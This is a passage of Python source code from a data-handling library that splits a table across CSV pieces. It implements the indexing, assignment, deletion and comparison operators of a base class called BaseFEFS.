\n    def __str_check(self,colname):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n\n        assert isinstance(colname,str_types)\n        \n        if colname not in self.colnames:\n            print(\"No such column name as %s, try update action\"%colname)\n            assert False\n        return\n    \n\n    def __strs_check(self,colnames):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n\n        assert isinstance(colnames,list)\n        assert all([ isinstance(s,str_types) for s in colnames ])\n        \n        if len(set(colnames) - set(self.colnames)) > 0:\n            print(\"Some requested column names don't exist.\")\n            print(\"You may consider the \\\"update\\\" action.\")\n            assert False\n        return\n\n\n    def __bools_check(self,B):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n\n        assert isinstance(B,list)\n        assert all([ isinstance(b,bool_types) for b in B ])\n        assert len(B) == len(self) # has to be equal length\n        return\n\n    \n    # Only for __setitem__'s strs and indices (and thus bools).\n    def __value_check(self, value, assignment_w, assignment_h):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n\n        \"\"\"\n        Only for __setitem__'s strs and indices (and bools).\n        Return a 2D or 1D array such that arr[idx:(idx+n)]\n        yields the corresponding rows for assignment.\n        \"\"\"\n        # check value\n        if isinstance(value,(arr_types,pd.DataFrame)):\n            value = np.array(value)\n            if len(value.shape) == 1:\n                if value.shape[0] == 1: # this is value = [x]\n                    value = value[0] # will be turned to list    \n                else:\n                    assert value.shape[0] == assignment_w\n            elif len(value.shape) == 2:\n                assert (value.shape[1] == assignment_w) or (value.shape[1] == 1)\n                assert (value.shape[0] == assignment_h) or (value.shape[0] == 1)    \n            else: # at most 2 dimensional array, of course\n                print(\"Dimension of the assignment:\", value.shape)\n                assert False\n        elif isinstance(value,range):\n            print(type(value), \"type can only be assigned to pd.Series\")\n            assert False\n        \n        if not isinstance(value,(arr_types,pd.DataFrame)):\n            value = [value]*assignment_h # turn a scalar into a list    \n\n        return value\n\n    ##################################### Overriding Square Bracket - general: END #####################################\n    ####################################################################################################################\n    \n\n\n\n    \n\n    ####################################################################################################################\n    ##################################### Overriding Square Bracket - getitem: BEG #####################################\n    \n    def __get_piece_idx(self, idx, orders):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n        \n        accum_row_cnt = 0\n        _order = None\n        for _ord in orders:\n            row_cnt = self.row_cnts[_ord]\n            if idx > row_cnt - 1:\n                idx -= row_cnt\n                accum_row_cnt += row_cnt\n                continue\n            _order = _ord\n            break\n        \n        return (_order, accum_row_cnt)\n\n    \n\n    def __getitem__using_idx(self,idx):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n        \n        idx = self.__idx_check(idx)    \n        orders = 
self.__no_overlapping_seq_range()\n _order, accum_row_cnt = self.__get_piece_idx(idx, orders)\n \n df = self.dfs[_order]\n if df is None:\n df = self.__read_piece(_order)\n self.dfs[_order] = df\n\n idx -= accum_row_cnt\n type_ = self.types[_order]\n if type_ == \"csv\":\n self.renew_idx(_order)\n return df.iloc[idx]\n \n elif type_ == self.__class__.__name__:\n # elif type_ == \"tsfefs\":\n fefs = df\n self.renew_idx(_order)\n return fefs[idx]\n \n else:\n print(\"Type\", type_, \"not supported\")\n assert False\n \n print(\"Error! Find it out!\")\n assert False\n \n \n \n def __getitem__using_str(self,colname):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n self.__str_check(colname)\n \n values = []\n orders = self.__no_overlapping_seq_range()\n for _order in orders:\n df = self.dfs[_order]\n if df is None:\n df = self.__read_piece(_order)\n self.dfs[_order] = df\n values.extend(df[colname])\n S = pd.Series(values)\n S.name = colname\n return S\n\n\n def __get_indices_in_same_piece(self, indices, orders):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n idx = indices[0]\n _order, accum_row_cnt = self.__get_piece_idx(idx, orders) \n if _order is None:\n assert False\n \n idx_beg = accum_row_cnt\n idx_end = accum_row_cnt + self.row_cnts[_order]\n idx_range = range(idx_beg,idx_end)\n \n adjusted_indices = []\n for idx in indices:\n if idx in idx_range:\n adjusted_indices.append(idx-accum_row_cnt)\n continue\n break\n \n return (_order, adjusted_indices)\n \n \n \n def __getitem__using_indices(self,indices):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n indices = self.__indices_check(indices)\n indices_copied = dc(indices)\n\n dfs = []\n orders = self.__no_overlapping_seq_range()\n \n while len(indices) > 0:\n _order, adjusted_indices = self.__get_indices_in_same_piece(indices, orders)\n df = self.dfs[_order]\n if df is None:\n df = self.__read_piece(_order)\n\n type_ = self.types[_order] \n if type_ == \"csv\":\n df_ = df.iloc[adjusted_indices]\n \n self.renew_idx(_order)\n\n elif type_ == self.__class__.__name__:\n fefs = df\n df_ = fefs[adjusted_indices]\n self.renew_idx(_order)\n \n else:\n print(\"Type\", type_, \"not supported\")\n assert False\n \n dfs.append(df_)\n indices = indices[len(adjusted_indices):]\n \n\n if len(dfs) == 0:\n return pd.DataFrame()\n \n df = pd.concat(dfs).reset_index(drop=True)\n df.index = indices_copied\n return df\n \n\n\n def __getitem__using_bools(self,B):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n self.__bools_check(B)\n \n indices = np.array(range(len(B)))[B].tolist()\n return self.__getitem__using_indices(indices)\n\n \n def __getitem__using_strs(self,colnames):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n self.__strs_check(colnames)\n \n dfs = []\n indices = []\n cum_row_cnt = 0\n orders = self.__no_overlapping_seq_range()\n for _order in orders:\n df = self.dfs[_order]\n if df is None:\n df = self.__read_piece(_order)\n self.dfs[_order] = df\n dfs.append(df[colnames])\n indices += list(np.array(self.__class__.get_index(df)) + cum_row_cnt)\n cum_row_cnt += 
self.row_cnts[_order]\n        \n        if len(dfs) == 0:\n            return pd.DataFrame()\n        \n        df = pd.concat(dfs).reset_index(drop=True)\n        df.index = indices\n        return df\n    \n    \n    def __getitem__(self, key):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n        \n        \"\"\"\n        Acceptable queries:\n        Single:\n        - int: fefs[33]\n        - str: fefs[\"age\"]\n        Multiple:\n        - slice of ints: fefs[20:], fefs[20:50], fefs[::2], ...\n        - list of ints: fefs[[1,2,5,10]]\n        - list of strs: fefs[[\"time\",\"purchased\",\"item\",\"price\"]]\n        - list of bools: fefs[[True,False,True,...]] # must have length == row_cnt\n        \"\"\"    \n        if isinstance(key,str_types):\n            return self.__getitem__using_str(key)\n        elif isinstance(key,int_types):\n            return self.__getitem__using_idx(key)\n        elif isinstance(key,(arr_types,slice)):\n            if isinstance(key,np.ndarray):\n                assert len(key.shape) == 1 # must be in (n,)\n                key = list(key)\n            elif isinstance(key,pd.Series):\n                key = list(key)\n            elif isinstance(key,slice):\n                assert all([ (s is None) or isinstance(s,int) for s in [ key.start,key.stop,key.step ] ])\n                key = list(range(self.row_cnt))[key]\n            \n            \n            if len(key) == 0:\n                return pd.DataFrame()\n            \n            \n            type_ = type(key[0])\n            assert isinstance(key[0],(int_types,str_types,bool_types))\n            assert all([ isinstance(k,type_) for k in key ])\n            \n            if type_ in str_types:\n                return self.__getitem__using_strs(key)\n            elif type_ in bool_types:\n                return self.__getitem__using_bools(key)\n            elif type_ in int_types:\n                return self.__getitem__using_indices(key)\n            else:\n                print(\"No such type\")\n                assert False\n        else:\n            print(\"Something's wrong for the type(s)\")\n            assert False\n    \n    ##################################### Overriding Square Bracket - getitem: END #####################################\n    ####################################################################################################################\n\n\n\n    \n    \n    \n    \n    \n    \n    ####################################################################################################################\n    ##################################### Overriding Square Bracket - setitem: BEG #####################################\n    \n    def __setitem__using_idx(self, idx, value):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n        \n        idx = self.__idx_check(idx)\n\n        if isinstance(value, arr_types):\n            arr = np.array(value)\n            assert len(arr.shape) == 1 # like (4,)\n            col_len = arr.shape[0]\n            assert col_len == len(self.colnames)\n        else:\n            pass # any single value may be assigned to the idx row.\n        \n        orders = self.__no_overlapping_seq_range()\n        for _order in orders:\n            row_cnt = self.row_cnts[_order]\n            if idx > row_cnt - 1:\n                idx -= row_cnt\n                continue\n            df = self.dfs[_order]\n            if df is None:\n                df = self.__read_piece(_order)\n            self.actions[_order] = \"update\"\n            type_ = self.types[_order]\n            if type_ == \"csv\":\n                df.iloc[idx] = value\n                self.dfs[_order] = df\n            elif type_ == self.__class__.__name__:\n                fefs = df\n                fefs[idx] = value\n                self.dfs[_order] = fefs\n            else:\n                print(\"Type\", type_, \"not supported\")\n                assert False\n            \n            self.renew_idx(_order)\n            return\n        \n        print(\"Error! Find it out!\")\n        assert False\n        return\n\n\n    def __setitem__using_str(self, colname, value):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n        \n        # don't use the same checking routine here\n        # self.__str_check(colname)\n        \n        assert isinstance(colname,str_types)\n        \n        if isinstance(value,(arr_types,range)):\n            assert len(value) == self.row_cnt\n            value = list(value)\n        elif isinstance(value,pd.DataFrame):\n            assert len(value) == self.row_cnt\n            assert len(value.columns) == 1\n            col = list(value.columns)[0]\n            value = np.array(value[col])\n        else:\n            value = [value]*self.row_cnt\n\n        cnt = 0\n        orders = self.__no_overlapping_seq_range()\n        for _order in orders:\n            idx = _order\n            df = self.dfs[_order]\n            if df is None:\n                df = self.__read_piece(idx)\n\n            cnt_new = cnt + self.row_cnts[_order]\n            df[colname] = value[ cnt : cnt_new ]\n            cnt = cnt_new\n            self.dfs[_order] = df\n            self.actions[_order] = \"update\"\n        \n        if colname not in self.colnames:\n            self.colnames += [colname]\n        return\n\n\n    \n    def __setitem__using_indices(self,indices,value):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n        \n        indices = self.__indices_check(indices)\n        value = self.__value_check(value, len(self.colnames), len(indices))\n        orders = self.__no_overlapping_seq_range()\n        \n        cnt = 0\n        for idx in indices:\n            df_ = None\n            for _order in orders:\n                row_cnt = self.row_cnts[_order]\n                if idx > row_cnt - 1:\n                    idx -= row_cnt\n                    continue\n                df = self.dfs[_order]\n                if df is None:\n                    df = self.__read_piece(_order)\n                \n                type_ = self.types[_order]\n                if type_ == \"csv\":\n                    df_ = df.iloc[idx:(idx+1)]\n                elif type_ == self.__class__.__name__:\n                    fefs = df\n                    df_ = fefs[idx:(idx+1)]\n                else:\n                    print(\"Type\", type_, \"is not supported\")\n                    assert False\n                break\n            \n            if len(df_) == 0:\n                print(\"Index could be out of range\")\n                assert False\n            \n            cnt_new = cnt + 1\n            if type_ == \"csv\":\n                df.iloc[[idx]] = value[ cnt : cnt_new ]\n                self.dfs[_order] = df\n            elif type_ == self.__class__.__name__:\n                fefs[[idx]] = value[ cnt : cnt_new ]\n                self.dfs[_order] = fefs\n            else:\n                print(\"Type\", type_, \"not supported\")\n                assert False\n            cnt = cnt_new    \n            self.actions[_order] = \"update\"\n            \n            self.renew_idx(_order)\n\n        return\n    \n\n    def __setitem__using_bools(self,B,value):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n        \n        self.__bools_check(B)\n        indices = np.array(range(len(B)))[B].tolist()\n        self.__setitem__using_indices(indices,value)\n        return\n\n\n    def __setitem__using_strs(self,colnames,value):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n        \n        self.__strs_check(colnames)\n        value = self.__value_check(value, len(colnames), self.row_cnt)\n        orders = self.__no_overlapping_seq_range()\n        \n        cum_row_cnt = 0\n        for _order in orders:\n            idx = _order\n            df = self.dfs[_order]\n            if df is None:\n                df = self.__read_piece(idx)\n            new_cum_row_cnt = cum_row_cnt + self.row_cnts[_order]\n            df[colnames] = value[cum_row_cnt:new_cum_row_cnt]\n            self.dfs[_order] = df\n            cum_row_cnt = new_cum_row_cnt\n            self.actions[_order] = \"update\"\n        return\n\n    \n    def __setitem__(self, key, value):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n        \n        \"\"\"\n        
Acceptable assignments:\n        Single:\n        - int: fefs[33] = value # row index 33 assignment\n        - str: fefs[\"age\"] = value\n        Multiple:\n        - slice of ints: fefs[20:] = value, fefs[20:50] = value, fefs[::2] = value, ...\n        - list of ints: fefs[[1,2,5,10]] = value\n        - list of strs: fefs[[\"time\",\"purchased\",\"item\",\"price\"]] = value\n        - list of bools: fefs[[True,False,True,...]] = value # must have length == row_cnt\n        \"\"\"    \n        if isinstance(key,str_types):\n            self.__setitem__using_str(key, value)\n        elif isinstance(key,int_types):\n            self.__setitem__using_idx(key, value)\n        elif isinstance(key,(arr_types,slice)):\n            if isinstance(key,np.ndarray):\n                assert len(key.shape) == 1 # must be in (n,)\n                key = list(key)\n            elif isinstance(key,pd.Series):\n                key = list(key)\n            elif isinstance(key,slice):    \n                assert all([ (s is None) or isinstance(s,int) for s in [ key.start,key.stop,key.step ] ])\n                key = list(range(self.row_cnt))[key]\n            \n            type_ = type(key[0])\n            assert isinstance(key[0],(int_types,str_types,bool_types))\n            assert all([ isinstance(k,type_) for k in key ])\n            \n            if type_ in str_types:\n                self.__setitem__using_strs(key,value)\n            elif type_ in bool_types:\n                self.__setitem__using_bools(key,value)\n            elif type_ in int_types:\n                self.__setitem__using_indices(key,value)\n            else:\n                print(\"No such type\")\n                assert False\n        else:\n            print(\"Something's wrong for the type(s)\")\n            assert False\n        \n        self.take_actions(max_level=0)\n        return\n    ##################################### Overriding Square Bracket - setitem: END #####################################\n    ####################################################################################################################\n\n    \n    \n    \n    \n\n    \n\n\n\n    ####################################################################################################################\n    ##################################### Overriding Square Bracket - delitem: BEG #####################################\n    \n    def __delitem__using_idx(self,idx):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n\n        idx = self.__idx_check(idx)    \n        orders = self.__no_overlapping_seq_range()\n        _order, accum_row_cnt = self.__get_piece_idx(idx, orders)\n\n        df = self.dfs[_order]\n        if df is None:\n            df = self.__read_piece(_order)\n            self.dfs[_order] = df\n\n        idx -= accum_row_cnt\n        type_ = self.types[_order]\n        row_cnt = self.row_cnts[_order]\n        len_ = None\n        if type_ == \"csv\":\n            \"\"\"\n            Since there's no del df[idx] for a dataframe\n            \"\"\"\n            B = [True]*row_cnt\n            B[idx] = False\n            df = df[B].reset_index(drop=True)\n            len_ = len(df)\n        elif type_ == self.__class__.__name__:\n            fefs = df\n            del fefs[idx]\n            fefs.take_actions(max_level=4)\n            len_ = len(fefs) # since action is taken, this fefs' row_cnt is updated.\n            df = fefs\n        else:\n            print(\"Type\", type_, \"not supported\")\n            assert False\n\n        self.dfs[_order] = df\n        self.actions[_order] = \"update\"\n\n        \"\"\"\n        Should it be renewed in cache?\n        2023-10-07, decided not to renew in cache.\n        \"\"\"\n        # self.renew_idx(_order)    \n        \n        if len_ == 0:\n            self.actions[_order] = \"delete\"\n        return    \n\n\n    def __delitem__using_str(self,colname):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n\n        self.__str_check(colname)\n        assert colname != self.seq_col\n\n        orders = self.__no_overlapping_seq_range()\n        for _order in orders:\n            df = self.dfs[_order]\n            if df is None:\n                df = self.__read_piece(_order)\n            del df[colname]\n            self.dfs[_order] = df\n            self.actions[_order] = \"save\"\n        self.colnames.remove(colname)\n        return    \n\n\n    def __delitem__using_indices(self,indices):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n\n        indices = self.__indices_check(indices)\n        indices_copied = dc(indices)\n        \n        orders = self.__no_overlapping_seq_range()\n\n        while len(indices) > 0:\n            _order, adjusted_indices = self.__get_indices_in_same_piece(indices, orders)\n            df = self.dfs[_order]\n            if df is None:\n                df = self.__read_piece(_order)\n\n            type_ = self.types[_order]\n            if type_ == \"csv\":\n                row_cnt = self.row_cnts[_order]\n                B = np.array([True]*row_cnt)\n                B[adjusted_indices] = False\n                df = df[B].reset_index(drop=True)\n                len_ = len(df)\n            elif type_ == self.__class__.__name__:\n                fefs = df\n                del fefs[adjusted_indices]\n                fefs.take_actions(max_level=4)\n                len_ = fefs.row_cnt # since action is taken, this fefs' row_cnt is updated.\n                df = fefs\n            else:\n                print(\"Type\", type_, \"not supported\")\n                assert False\n\n            self.dfs[_order] = df\n            self.actions[_order] = \"update\"\n\n            \"\"\"\n            Should it be renewed in cache?\n            2023-10-07, decided not to renew in cache.\n            \"\"\"\n            # self.renew_idx(_order)\n\n            if len_ == 0:\n                self.actions[_order] = \"delete\"\n            \n            indices = indices[len(adjusted_indices):]\n        return\n\n\n    def __delitem__using_bools(self,B):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n\n        self.__bools_check(B)\n\n        indices = np.array(range(len(B)))[B].tolist()\n        self.__delitem__using_indices(indices)\n        return    \n\n\n    def __delitem__using_strs(self,colnames):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n\n        self.__strs_check(colnames)\n        assert self.seq_col not in colnames\n        \n        orders = self.__no_overlapping_seq_range()\n        for _order in orders:\n            df = self.dfs[_order]\n            type_ = self.types[_order]\n            if df is None:\n                df = self.__read_piece(_order)\n            \n            if type_ == \"csv\":\n                for col in colnames:\n                    del df[col]\n            elif type_ == self.__class__.__name__:\n                del df[colnames]\n            else:\n                print(\"Type\", type_, \"not supported\")\n                assert False\n            \n            self.dfs[_order] = df\n            self.actions[_order] = \"save\"\n        \n        for col in colnames:\n            self.colnames.remove(col)\n        return\n\n\n    def __delitem__(self, key):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n\n        \"\"\"\n        Acceptable delete:\n        Single:\n        - int: del fefs[33]\n        - str: del fefs[\"age\"]\n        Multiple:\n        - slice of ints: del fefs[20:], del fefs[20:50], del fefs[::2], ...\n        - list of ints: del fefs[[1,2,5,10]]\n        - list of strs: del fefs[[\"time\",\"purchased\",\"item\",\"price\"]]\n        - list of bools: del fefs[[True,False,True,...]] # must have length == row_cnt\n        \"\"\"    \n        if isinstance(key,str_types):\n            self.__delitem__using_str(key)\n            return\n        elif isinstance(key,int_types):\n            self.__delitem__using_idx(key)\n            return\n        elif isinstance(key,(arr_types,slice)):\n            if isinstance(key,np.ndarray):\n                assert len(key.shape) == 1 # must be in (n,)\n                key = list(key)\n            elif isinstance(key,pd.Series):\n                key = list(key)\n            elif isinstance(key,slice):    \n                assert all([ (s is None) or isinstance(s,int) for s in [ key.start,key.stop,key.step ] ])\n                key = list(range(self.row_cnt))[key]\n\n            type_ = type(key[0])\n            assert 
isinstance(key[0],(int_types,str_types,bool_types))\n assert all([ isinstance(k,type_) for k in key ])\n\n if type_ in str_types:\n self.__delitem__using_strs(key)\n return\n elif type_ in bool_types:\n self.__delitem__using_bools(key)\n return\n elif type_ in int_types:\n self.__delitem__using_indices(key)\n return\n else:\n print(\"No such type\" )\n assert False\n else:\n print(\"Something's wrong for the type(s)\")\n assert False\n \n ##################################### Overriding Square Bracket - delitem: END #####################################\n ####################################################################################################################\n\n\n\n \n \n \n \n \n\n \n\n ######################################################################################################################\n ############################################# Overriding ==, >, <, >=, <=: BEG #######################################\n\n def __get_seq_type(self):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n if self.seq_type is not None:\n return self.seq_type\n\n \n for df in self.dfs:\n if df is not None:\n break\n \n if df is None:\n S = self.__get_seq(0)\n else:\n S = df[self.seq_col]\n \n s = list(S)[0]\n # Elements in df[seq_col] have to be in the defined types\n type_tups = [ int_types, float_types, str_types, bool_types, arr_types, dt_types ]\n for type_tup in type_tups:\n if isinstance(s, type_tup):\n self.seq_type = type_tup\n return type_tup\n assert False\n \n\n\n\n \"\"\"\n The operators will be about the comparison of timestamps\n Need to check:\n 1. fefs1 fefs2\n 2. fefs df\n 3. df fefs\n 4. fefs ts\n 5. fefs pd.Series(tss)\n \n The codes are strictly prohibited from using fefs[seq_col],\n since such operation will affect the cache.\n \"\"\"\n # def __read_time(self, idx):\n def __read_seq(self, idx):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n piece = self.pieces[idx]\n fullname = self.__compose_piece_fullname(piece)\n \n type_ = self.types[idx]\n if type_ == \"csv\":\n\n \n # dtf = self.datetime_format\n seq_col = self.seq_col\n\n if self.seq_read_dtype is None:\n df = pd.read_csv(fullname, usecols=[seq_col])\n else:\n df = pd.read_csv(fullname, usecols=[seq_col], dtype={seq_col:self.seq_read_dtype})\n\n if self.seq_trans_method is not None:\n assert self.seq_inv_trans_method is not None\n df[seq_col] = df[seq_col].apply(lambda x: self.seq_trans_method(x))\n\n df = df.sort_values(by=seq_col).reset_index(drop=True)\n S = df[seq_col]\n \n elif type_ == self.__class__.__name__:\n\n fefs = self.__class__()\n fefs.read(fullname)\n S = fefs.__get_seqs()\n \n else:\n print(\"File type\", self.__class__, \"not supported\")\n assert False\n \n return S\n \n \n\n def __get_seq(self, idx):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n df = self.dfs[idx]\n type_ = self.types[idx]\n if df is None:\n S = self.__read_seq(idx)\n return S\n\n if type_ == \"csv\":\n S = df[self.seq_col]\n elif type_ == self.__class__.__name__:\n fefs = df\n S = fefs.__get_seqs()\n else:\n assert False\n \n return S\n\n\n\n\n def __get_seqs(self):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n S = []\n for order_ in 
self.__no_overlapping_seq_range():\n            S_ = self.__get_seq(order_)\n            S_ = list(S_)\n            S.extend(S_)\n        S = pd.Series(S)\n        return S\n\n    \n    def get_seqs(self):\n        return self.__get_seqs()\n    \n    \n\n    def __eq_series(self, S):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n\n        seq_type_ = self.__get_seq_type()\n        assert self.row_cnt == len(S)\n        assert all( isinstance(s,seq_type_) for s in S )    \n        S_ = self.__get_seqs()\n        B = S_ == S\n        return B\n    \n    \n    def __eq_fefs(self, fefs):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n        \n        assert self.seq_col == fefs.seq_col\n        assert self.row_cnt == fefs.row_cnt\n        \n        S = fefs.__get_seqs()\n        return self.__eq_series(S)\n\n\n    def __eq_df(self, df):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n        \n        assert self.row_cnt == len(df)\n        S = df[self.seq_col]\n        return self.__eq_series(S)\n\n    \n    def __eq_s(self, s):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n        \n        S = self.__get_seqs()\n        return S == s    \n\n\n    def __eq__(self, other):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n        \n        if isinstance(other, pd.Series):\n            return self.__eq_series(other)\n        elif isinstance(other, self.__class__):\n            return self.__eq_fefs(other)\n        elif isinstance(other, pd.DataFrame):\n            return self.__eq_df(other)\n        elif isinstance(other, self.__get_seq_type()):\n            return self.__eq_s(other)\n        else:\n            print(\"Type\", type(other), \"is not supported.\")\n            assert False\n\n    \n    \n\n    def __ne_series(self, S):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n\n        seq_type_ = self.__get_seq_type()\n        assert self.row_cnt == len(S)\n        assert all( isinstance(s,seq_type_) for s in S )    \n        S_ = self.__get_seqs()\n        B = S_ != S\n        return B\n    \n    \n    def __ne_fefs(self, fefs):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n\n        assert self.seq_col == fefs.seq_col\n        assert self.row_cnt == fefs.row_cnt\n        \n        S = fefs.__get_seqs()\n        return self.__ne_series(S)\n\n    \n    def __ne_df(self, df):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n\n        assert self.row_cnt == len(df)\n        S = df[self.seq_col]\n        return self.__ne_series(S)\n\n    \n    def __ne_s(self, s):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n        \n        S = self.__get_seqs()\n        return S != s    \n\n\n    def __ne__(self, other):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n        \n        if isinstance(other, pd.Series):\n            return self.__ne_series(other)\n        elif isinstance(other, self.__class__):\n            return self.__ne_fefs(other)\n        elif isinstance(other, pd.DataFrame):\n            return self.__ne_df(other)\n        elif isinstance(other, self.__get_seq_type()):\n            return self.__ne_s(other)\n        else:\n            print(\"Type\", type(other), \"is not supported.\")\n            assert False\n\n    \n    \n    \n    def __lt_series(self, S):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n\n        seq_type_ = self.__get_seq_type()\n        assert self.row_cnt == len(S)\n        assert all( isinstance(s,seq_type_) for s in S )\n        S_ = self.__get_seqs()\n        B = S_ < S\n        return B\n    \n\n    def __lt_fefs(self, fefs):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n\n        assert self.seq_col == fefs.seq_col\n        assert self.row_cnt == fefs.row_cnt\n        S = fefs.__get_seqs()\n        return self.__lt_series(S)\n\n\n    def __lt_df(self, df):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n\n        assert self.row_cnt == len(df)\n        S = df[self.seq_col]\n        return self.__lt_series(S)\n    \n\n    def __lt_s(self, s):\n        \n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n        \n        S = self.__get_seqs()\n        B = S < s\n        return B\n    \n\n    def __lt__(self, other):\n        \n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n        \n        if isinstance(other, pd.Series):\n            return self.__lt_series(other)\n        elif isinstance(other, self.__class__):\n            return self.__lt_fefs(other)\n        elif isinstance(other, pd.DataFrame):\n            return self.__lt_df(other)\n        elif isinstance(other, self.__get_seq_type()):\n            return self.__lt_s(other)\n        else:\n            print(\"Type\", type(other), \"is not supported.\")\n            assert False\n\n\n\n\n    def __gt_series(self, S):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n\n        seq_type_ = self.__get_seq_type()\n        assert self.row_cnt == len(S)\n        assert all( isinstance(s,seq_type_) for s in S )\n        S_ = self.__get_seqs()\n        B = S_ > S\n        return B\n    \n\n    def __gt_fefs(self, fefs):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n\n        assert self.seq_col == fefs.seq_col\n        assert self.row_cnt == fefs.row_cnt\n        S = fefs.__get_seqs()\n        return self.__gt_series(S)\n\n\n    def __gt_df(self, df):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n\n        assert self.row_cnt == len(df)\n        S = df[self.seq_col]\n        return self.__gt_series(S)\n\n    \n    def __gt_s(self, s):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n\n        S = self.__get_seqs()\n        B = S > s\n        return B\n    \n    \n    def __gt__(self, other):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n\n        if isinstance(other, pd.Series):\n            return self.__gt_series(other)\n        elif isinstance(other, self.__class__):\n            return self.__gt_fefs(other)\n        elif isinstance(other, 